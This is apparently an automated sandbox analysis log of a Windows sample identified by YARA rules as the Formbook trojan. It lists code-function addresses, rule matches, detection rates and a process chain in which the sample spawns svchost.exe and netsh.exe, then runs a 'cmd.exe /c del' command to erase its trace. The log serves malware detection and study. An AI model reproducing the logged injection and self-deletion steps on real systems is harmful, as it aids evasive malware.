          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03634F40 | 3_2_03634F40
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03602F28 | 3_2_03602F28
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03662F30 | 3_2_03662F30
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035E0F30 | 3_2_035E0F30
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035B2FC8 | 3_2_035B2FC8
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0363EFA0 | 3_2_0363EFA0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C0E59 | 3_2_035C0E59
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367EE26 | 3_2_0367EE26
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367EEDB | 3_2_0367EEDB
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035D2E90 | 3_2_035D2E90
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367CE93 | 3_2_0367CE93
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035CAD00 | 3_2_035CAD00
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0365CD1F | 3_2_0365CD1F
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035BADE0 | 3_2_035BADE0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035D8DBF | 3_2_035D8DBF
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C0C00 | 3_2_035C0C00
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035B0CF2 | 3_2_035B0CF2
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03660CB5 | 3_2_03660CB5
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035AD34C | 3_2_035AD34C
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367132D | 3_2_0367132D
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0360739A | 3_2_0360739A
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_036612ED | 3_2_036612ED
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035DB2C0 | 3_2_035DB2C0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035DD2F0 | 3_2_035DD2F0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C52A0 | 3_2_035C52A0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0368B16B | 3_2_0368B16B
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035AF172 | 3_2_035AF172
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035F516C | 3_2_035F516C
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035CB1B0 | 3_2_035CB1B0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367F0E0 | 3_2_0367F0E0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_036770E9 | 3_2_036770E9
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C70C0 | 3_2_035C70C0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0366F0CC | 3_2_0366F0CC
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367F7B0 | 3_2_0367F7B0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03605630 | 3_2_03605630
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_036716CC | 3_2_036716CC
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03677571 | 3_2_03677571
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_036895C3 | 3_2_036895C3
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0365D5B0 | 3_2_0365D5B0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035B1460 | 3_2_035B1460
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367F43F | 3_2_0367F43F
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367FB76 | 3_2_0367FB76
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03635BF0 | 3_2_03635BF0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035FDBF9 | 3_2_035FDBF9
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035DFB80 | 3_2_035DFB80
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03633A6C | 3_2_03633A6C
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03677A46 | 3_2_03677A46
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367FA49 | 3_2_0367FA49
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0366DAC6 | 3_2_0366DAC6
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03605AA0 | 3_2_03605AA0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03661AA3 | 3_2_03661AA3
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0365DAAC | 3_2_0365DAAC
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C9950 | 3_2_035C9950
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035DB950 | 3_2_035DB950
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03655910 | 3_2_03655910
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0362D800 | 3_2_0362D800
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C38E0 | 3_2_035C38E0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367FF09 | 3_2_0367FF09
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03583FD2 | 3_2_03583FD2
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03583FD5 | 3_2_03583FD5
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C1F92 | 3_2_035C1F92
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367FFB1 | 3_2_0367FFB1
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C9EB0 | 3_2_035C9EB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03677D73 | 3_2_03677D73
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035C3D40 | 3_2_035C3D40
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03671D5A | 3_2_03671D5A
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035DFDC0 | 3_2_035DFDC0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_03639C32 | 3_2_03639C32
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0367FCF2 | 3_2_0367FCF2
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0095D593 | 3_2_0095D593
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0095E793 | 3_2_0095E793
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_00942D90 | 3_2_00942D90
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_00942D88 | 3_2_00942D88
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0095EE2E | 3_2_0095EE2E
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_00949E50 | 3_2_00949E50
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_00942FB0 | 3_2_00942FB0
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010CA036 | 3_2_010CA036
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010C8912 | 3_2_010C8912
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010C1082 | 3_2_010C1082
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010C5B30 | 3_2_010C5B30
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010C5B32 | 3_2_010C5B32
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010CB232 | 3_2_010CB232
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010C2D02 | 3_2_010C2D02
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_010CE5CD | 3_2_010CE5CD
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0305F290 appears 103 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03027E54 appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FCB970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0304EA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03015130 appears 58 times
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: String function: 00FA9CB3 appears 31 times
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: String function: 00FC0A30 appears 46 times
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: String function: 00FBF9F2 appears 40 times
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 0362EA12 appears 86 times
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 03607E54 appears 107 times
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 035AB970 appears 262 times
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 035F5130 appears 58 times
          Source: C:\Windows\SysWOW64\netsh.exe | Code function: String function: 0363F290 appears 103 times
          Source: 8t1uarSZFV.exe, 00000000.00000003.1695360405.0000000003AAD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 8t1uarSZFV.exe
          Source: 8t1uarSZFV.exe, 00000000.00000003.1699765736.0000000003903000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 8t1uarSZFV.exe
          Source: 8t1uarSZFV.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 8t1uarSZFV.exe PID: 7292, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7312, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 7396, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/4@11/2
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_010137B5 GetLastError,FormatMessageW, | 0_2_010137B5
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_010010BF AdjustTokenPrivileges,CloseHandle, | 0_2_010010BF
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_010016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, | 0_2_010016C3
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_010151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, | 0_2_010151CD
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0102A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, | 0_2_0102A67C
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0101648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, | 0_2_0101648E
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, | 0_2_00FA42A2
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | File created: C:\Users\user\AppData\Local\Temp\aut2346.tmp
Source: 8t1uarSZFV.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 8t1uarSZFV.exe | ReversingLabs: Detection: 55%
Source: 8t1uarSZFV.exe | Virustotal: Detection: 47%
Source: unknown | Process created: C:\Users\user\Desktop\8t1uarSZFV.exe "C:\Users\user\Desktop\8t1uarSZFV.exe"
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8t1uarSZFV.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\8t1uarSZFV.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wininet.dll
